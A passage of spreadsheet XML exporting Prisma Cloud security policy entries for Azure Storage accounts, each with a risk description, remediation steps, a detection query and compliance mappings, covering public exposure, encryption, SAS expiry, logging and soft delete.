          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2464">
      <c r="A2464" t="inlineStr"/>
      <c r="B2464" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2464" s="2" t="inlineStr"/>
      <c r="D2464" t="inlineStr"/>
      <c r="E2464" t="inlineStr"/>
      <c r="F2464" t="inlineStr"/>
      <c r="G2464" t="b">
        <v>1</v>
      </c>
      <c r="H24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64" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2464" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2464" t="inlineStr">
        <is>
          <t>Potential data exposure risk due to a publicly exposed Azure Storage account not configured with secure transfer and contains sensitive machine learning workspace data</t>
        </is>
      </c>
      <c r="L2464" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2464" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2464" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2464" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2464" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2464" t="inlineStr"/>
      <c r="R2464" t="inlineStr"/>
      <c r="S2464" t="inlineStr"/>
      <c r="T2464" t="b">
        <v>0</v>
      </c>
      <c r="U2464" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2464" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2464" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to a publicly exposed Azure Storage accounts not configured with secure transfer and contains sensitive machine learning workspace data.
The sensitive machine learning workspace data in the storage asset not configured with secure transfer increases the risk of unauthorized access and data exposure. When secure transfer is enabled, REST APIs to access your storage accounts connect using HTTPs and any requests using HTTP will be rejected. Proper access control configurations and data protection measures should be in place to prevent potential compromise of critical data.
Immediate attention is required to restrict public exposure reported for the Storage account as soon as possible, configure secure transfer feature and enforce stricter access methods for reported Storage account as it contains sensitive machine learning workspace business information.</t>
        </is>
      </c>
      <c r="X2464"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To enable secure transfer feature on your storage account, follow below URL:
https://learn.microsoft.com/en-gb/azure/storage/common/storage-require-secure-transfer#require-secure-transfer-for-an-existing-storage-account
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly placed.</t>
        </is>
      </c>
      <c r="Y2464" t="inlineStr"/>
      <c r="Z2464" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage Account storing Machine Learning workspace high business impact data is publicly accessible','Azure Storage Account without Secure transfer enabled','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2464" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2464" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:40</t>
        </is>
      </c>
      <c r="AC2464" t="inlineStr"/>
      <c r="AD2464" t="b">
        <v>1</v>
      </c>
      <c r="AE2464" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2464" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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64" t="inlineStr">
        <is>
          <t>d1ffd3da-702d-4172-9a85-fd3cd4971bbc</t>
        </is>
      </c>
      <c r="AI2464" t="inlineStr">
        <is>
          <t>e5066370-cbfa-4bba-8657-0ae1fa6dd1fe</t>
        </is>
      </c>
      <c r="AJ2464" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2464" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2465">
      <c r="A2465" t="inlineStr"/>
      <c r="B2465" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2465" s="2" t="inlineStr"/>
      <c r="D2465" t="inlineStr"/>
      <c r="E2465" t="inlineStr"/>
      <c r="F2465" t="inlineStr"/>
      <c r="G2465" t="b">
        <v>1</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2465" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2465" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to publicly exposed Azure Storage account using an encryption key configured by access policy with privileged operations</t>
        </is>
      </c>
      <c r="L2465" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE,DISCOVERY</t>
        </is>
      </c>
      <c r="M2465" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2465" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2465" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2465" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2465" t="inlineStr"/>
      <c r="R2465" t="inlineStr"/>
      <c r="S2465" t="inlineStr"/>
      <c r="T2465" t="b">
        <v>0</v>
      </c>
      <c r="U2465" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2465" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2465" t="inlineStr">
        <is>
          <t>This policy identifies potential sensitive data exposure risk due to publicly exposed Azure Storage accounts containing sensitive data and encrypted by an encryption key configured access policy with privileged operations.
The combination of access policy with privileged operations, the presence of sensitive data in the storage, and entity having access to an encryption key allows them to alter/delete the data encrypted by it, making the data more easily accessible and increases the risk of unauthorized access and data exfiltration.
Immediate attention is required to review the Storage and its encryption keys should have a proper access policy to restrict only required operations based on business requirements instead of having wide access.</t>
        </is>
      </c>
      <c r="X2465" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Log in to Azure Portal
2. Navigate to your Storage account and display the Encryption settings
3. Keep note of the Key vault and Key used
4. Navigate to the Key Vault resource noted
5. Select Access policies, select the key noted
6. Click on Edit and make sure only required permissions are checked instead of Select all and only required operations are selected instead of privileged operations as per business requirement.
[PUBLIC_ACCESS]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[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2465" t="inlineStr"/>
      <c r="Z2465" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage account encryption key configured by access policy with privileged operations','Azure storage account has a blob container with public access','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2465" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2465" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:34</t>
        </is>
      </c>
      <c r="AC2465" t="inlineStr"/>
      <c r="AD2465" t="b">
        <v>1</v>
      </c>
      <c r="AE2465" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2465" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>ea509998-c9ce-4739-bccb-a8ac7882d5d0</t>
        </is>
      </c>
      <c r="AI2465" t="inlineStr">
        <is>
          <t>1487496b-a160-4704-8148-18b81ae082dc</t>
        </is>
      </c>
      <c r="AJ2465" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2465" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2466">
      <c r="A2466" t="inlineStr"/>
      <c r="B2466" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2466" s="2" t="inlineStr"/>
      <c r="D2466" t="inlineStr"/>
      <c r="E2466" t="inlineStr"/>
      <c r="F2466" t="inlineStr"/>
      <c r="G2466" t="b">
        <v>1</v>
      </c>
      <c r="H246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66" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2466" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2466" t="inlineStr">
        <is>
          <t>Potential data exposure risk due to publicly exposed Azure Storage account containing sensitive high business impact machine learning data is not encrypted by CMK</t>
        </is>
      </c>
      <c r="L2466" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA,MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2466" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2466" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2466" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2466" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2466" t="inlineStr"/>
      <c r="R2466" t="inlineStr"/>
      <c r="S2466" t="inlineStr"/>
      <c r="T2466" t="b">
        <v>0</v>
      </c>
      <c r="U2466" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2466" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2466" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to publicly exposed Azure Storage account containing sensitive high business impact machine learning data is not encrypted by CMK (Customer-Managed Key).
Azure Storage account stores machine learning artifacts such as job logs. By default, this storage account is used when you upload data to the workspace. The attacker could exploit a publicly accessible storage account to get machine learning workspace high business impact data logs and could breach into the system by leveraging the data exposed. Proper access control and data protection measures can be achieved by encrypting storage account via CMKs granular control.
Immediate attention is required to restrict public exposure reported for the Storage account as soon as possible, encrypt data by CMK and enforce stricter access methods for reported Storage account as it contains sensitive machine learning workspace business information.</t>
        </is>
      </c>
      <c r="X2466"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1. Log in to Azure Portal
2. Go to Storage accounts dashboard and Click on reported storage account
3. Under the Settings menu, click on Encryption
4. Select Customer Managed Keys
- Choose 'Enter key URI' and Enter 'Key URI'
OR
- Choose 'Select from Key Vault', Enter 'Key Vault' and 'Encryption Key'
5. Click on 'Save'
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly placed.</t>
        </is>
      </c>
      <c r="Y2466" t="inlineStr"/>
      <c r="Z2466" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage Account storing Machine Learning workspace high business impact data is publicly accessible','(Disabled) Azure Storage account Encryption Customer Managed Keys Disabled','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2466" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2466" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:41</t>
        </is>
      </c>
      <c r="AC2466" t="inlineStr"/>
      <c r="AD2466" t="b">
        <v>1</v>
      </c>
      <c r="AE2466" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2466" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG246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66" t="inlineStr">
        <is>
          <t>30f310ec-f973-434e-9059-787f25ef2ece</t>
        </is>
      </c>
      <c r="AI2466" t="inlineStr">
        <is>
          <t>79fc5f06-9860-4d99-b875-ada65f79012e</t>
        </is>
      </c>
      <c r="AJ2466" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2466" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2467">
      <c r="A2467" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2467" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2467" s="2" t="inlineStr"/>
      <c r="D2467" t="inlineStr"/>
      <c r="E2467" t="inlineStr"/>
      <c r="F2467" t="inlineStr"/>
      <c r="G2467" t="b">
        <v>1</v>
      </c>
      <c r="H24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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2467" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2467" t="inlineStr">
        <is>
          <t>Azure Storage account not configured with SAS expiration policy</t>
        </is>
      </c>
      <c r="L2467" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2467" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2467" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2467" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2467" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2467" t="inlineStr">
        <is>
          <t>TA0009</t>
        </is>
      </c>
      <c r="R2467" t="inlineStr">
        <is>
          <t>T1530 - Data from Cloud Storage (TA0009)</t>
        </is>
      </c>
      <c r="S2467" t="inlineStr"/>
      <c r="T2467" t="b">
        <v>0</v>
      </c>
      <c r="U2467" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2467" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2467" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage accounts not configured with SAS expiration policy.
A Shared Access Signature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 If Azure Storage logging with Azure Monitor is enabled, then an entry is written to the Azure Storage logs. It is recommended that you limit the interval for a SAS in case it is compromised.
For more details:
https://learn.microsoft.com/en-us/azure/storage/common/sas-expiration-policy</t>
        </is>
      </c>
      <c r="X2467" t="inlineStr">
        <is>
          <t>To configure an expiration policy for shared access signatures for the reported Storage account, follow bellow URL:
https://learn.microsoft.com/en-us/azure/storage/common/sas-expiration-policy 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-41
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-41</t>
        </is>
      </c>
      <c r="Y2467" t="inlineStr"/>
      <c r="Z2467" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name= 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.allowSharedKeyAccess is true and properties.sasPolicy does not exist
{"category":"IAM","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA2467" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2467" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2467" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1072-CKV2_AZURE_41</t>
        </is>
      </c>
      <c r="AD2467" t="b">
        <v>1</v>
      </c>
      <c r="AE2467" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2467" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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7" t="inlineStr">
        <is>
          <t>8527f09d-effd-40b7-a897-14dc1558270a</t>
        </is>
      </c>
      <c r="AI2467" t="inlineStr">
        <is>
          <t>e528afca-40d1-4355-81c8-db07048a814c</t>
        </is>
      </c>
      <c r="AJ2467" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2467" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2468">
      <c r="A2468" t="inlineStr">
        <is>
          <t>CIS v2.1.0 (Azure) Level 2, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, CIS v2.0.0 (Azure) Level 2, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2468" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2468" s="2" t="inlineStr"/>
      <c r="D2468" t="inlineStr"/>
      <c r="E2468" t="inlineStr"/>
      <c r="F2468" t="inlineStr"/>
      <c r="G2468" t="b">
        <v>1</v>
      </c>
      <c r="H246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68" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2468" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2468" t="inlineStr">
        <is>
          <t>Azure Storage account diagnostic setting for table is disabled</t>
        </is>
      </c>
      <c r="L2468" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2468" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2468" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2468" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2468" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2468" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2468" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2468" t="inlineStr"/>
      <c r="T2468" t="b">
        <v>0</v>
      </c>
      <c r="U2468" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2468" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2468" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage account tables that have diagnostic logging disabled.
By enabling diagnostic settings, you can capture various types of activities and events occurring within these storage account tables. These logs provide valuable insights into the operations, performance, and security of the storage account tables.
As a best practice, it is recommended to enable diagnostic logs on all storage account tables.</t>
        </is>
      </c>
      <c r="X2468" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to the Storage Accounts dashboard
3. Click on the reported Storage account
4. Under the 'Monitoring' menu, click on 'Diagnostic settings'
5. Select the table resource
6. Under 'Diagnostic settings', click on 'Add diagnostic setting'
7. At the top, enter the 'Diagnostic setting name'
8. Under 'Logs', select all the checkboxes under 'Categories'
9. Under 'Destination details', select the destination for logging
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2468" t="inlineStr"/>
      <c r="Z2468" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded as X; config from cloud.resource where api.name = 'azure-storage-account-table-diagnostic-settings' AND json.rule = properties.logs[*].enabled all true as Y; filter 'not($.X.name equal ignore case $.Y.StorageAccountName)'; show X;</t>
        </is>
      </c>
      <c r="AA2468" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2468" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2468" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1284</t>
        </is>
      </c>
      <c r="AD2468" t="b">
        <v>1</v>
      </c>
      <c r="AE2468" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2468" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG246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68" t="inlineStr">
        <is>
          <t>e2a3d4ae-c945-49ee-b629-78f20def6520</t>
        </is>
      </c>
      <c r="AI2468" t="inlineStr">
        <is>
          <t>4f6beda3-b112-4015-ad25-1ccc818a5eac</t>
        </is>
      </c>
      <c r="AJ2468" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2468" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2469">
      <c r="A2469" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.3.0 (Azure), NIST SP 800-171 Revision 3, Telecommunications Security Act - TSA, Copy of CIS Controls v8, kfirdaus AWS Account-CS, CRI Profile v2.0, CIS Controls v7.1, CIS v2.1.0 (Azure) Level 1, HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, CIS v2.0.0 (Azure) Level 1, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), NIST CSF v2.0, MLPS 2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v12, TX-RAMP Level 1, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Matt's ATT&amp;ACK, kashan ACSC Information Security Manual (ISM), SOC 2, Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS v1.5.0 (Azure) - Level 1, NIST CSF, ITSG-33, ISO/IEC 27017:2015, CSA CCM v.4.0.1, HITRUST CSF v.11.2.0, Copy of Azure Security Benchmark (v3), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST SP 800-171 Revision 3, MTSBv2_Azure, CSA CCM v.4.0.1, NIST 800-53 Rev 5, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v3.2.1, CIS v1.2.0 (Azure), ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), kfirdaus AWS Account-CS, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, DORA, CIS Controls v7.1, ISO/IEC 27002:2013, CIS Controls v8, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.3.1 (Azure), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-172, TX-RAMP Level 2, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], Copy of CIS v1.2.0 (Azure), ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v1.4.0 (Azure)</t>
        </is>
      </c>
      <c r="B2469" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2469" s="2" t="inlineStr"/>
      <c r="D2469" t="inlineStr"/>
      <c r="E2469" t="inlineStr"/>
      <c r="F2469" t="inlineStr"/>
      <c r="G2469" t="b">
        <v>1</v>
      </c>
      <c r="H24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avega-ar-azure-ad,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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2469" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2469" t="inlineStr">
        <is>
          <t>Azure Storage account soft delete is disabled</t>
        </is>
      </c>
      <c r="L2469" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2469" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2469" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2469" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2469" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2469" t="inlineStr">
        <is>
          <t>Storage Accounts</t>
        </is>
      </c>
      <c r="R2469" t="inlineStr">
        <is>
          <t>3.8</t>
        </is>
      </c>
      <c r="S2469" t="inlineStr"/>
      <c r="T2469" t="b">
        <v>1</v>
      </c>
      <c r="U2469" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2469" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2469" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage accounts which has soft delete disabled. Azure Storage contains important access logs, financial data, personal and other secret information which is accidentally deleted by a user or application could cause data loss or data unavailability. It is recommended to enable soft delete setting in Azure Storage accounts.</t>
        </is>
      </c>
      <c r="X2469" t="inlineStr">
        <is>
          <t>To enable Soft delete on your storage account, follow below URL:
https://learn.microsoft.com/en-gb/azure/storage/blobs/soft-delete-blob-enable?tabs=azure-portal#enable-blob-soft-delete 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-38
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-38</t>
        </is>
      </c>
      <c r="Y2469" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/blobServices/write' permission. Successful execution will enable soft delete for blobs on Azure Storage accounts. NOTE: As best practice we are setting delete retention days to 30 days; it can be changed based on customer requirement by cloning the policy.",
'impact': 'Enables Azure Storage accounts soft delete',
'cliScriptTemplate': 'az storage account blob-service-properties update --account-name $resourceName --resource-group $resourceGroup --enable-delete-retention true --delete-retention-days 30'</t>
        </is>
      </c>
      <c r="Z2469" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = deleteRetentionPolicy.blob.enabled is false and (kind does not equal ignore case FileStorage)
{"category":"General","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA2469" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2469" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2469" t="inlineStr">
        <is>
          <t>PC-AZR-STO-665-CKV2_AZURE_38</t>
        </is>
      </c>
      <c r="AD2469" t="b">
        <v>1</v>
      </c>
      <c r="AE2469" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2469" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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avega-ar-azure-ad - Notifications:, AccountGroups:avega-active-directory;,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69" t="inlineStr">
        <is>
          <t>f5a29936-659e-48a8-8110-783411bf6a9c</t>
        </is>
      </c>
      <c r="AI2469" t="inlineStr">
        <is>
          <t>854edc33-62b4-46c0-83a1-2774ae9ae4ff</t>
        </is>
      </c>
      <c r="AJ2469" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2469" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2470">
      <c r="A2470" t="inlineStr"/>
      <c r="B2470" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2470" s="2" t="inlineStr"/>
      <c r="D2470" t="inlineStr"/>
      <c r="E2470" t="inlineStr"/>
      <c r="F2470" t="inlineStr"/>
      <c r="G2470" t="b">
        <v>1</v>
      </c>
      <c r="H24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70" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2470" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2470" t="inlineStr">
        <is>
          <t>Potential AI data exposure risk due to Azure Storage account containing AI (Cognitive service) diagnostic data is publicly accessible</t>
        </is>
      </c>
      <c r="L2470" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2470" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2470" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2470" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2470" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2470" t="inlineStr"/>
      <c r="R2470" t="inlineStr"/>
      <c r="S2470" t="inlineStr"/>
      <c r="T2470" t="b">
        <v>0</v>
      </c>
      <c r="U2470" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2470" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2470" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to Azure Storage accounts containing AI (Cognitive service) diagnostic data is publicly accessible.
Azure Storage account can store AI Cognitive service diagnostic logs which might contain detailed information about platform logs, resource logs, trace logs and metrics. Diagnostic log data may contain sensitive AI data and helps in identifying potentially malicious activity. The attacker could exploit publicly accessible storage account to get cognitive diagnostic data logs and could breach into the system by leveraging exposed data and propagate across your system.
Immediate attention is required to restrict public exposure reported for the Storage account and enforce stricter access methods for reported Storage account as it contains AI cognitive service diagnostic log data.</t>
        </is>
      </c>
      <c r="X2470"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[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly placed.</t>
        </is>
      </c>
      <c r="Y2470" t="inlineStr"/>
      <c r="Z2470" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage Account storing Cognitive service diagnostic logs is publicly accessible','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2470" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
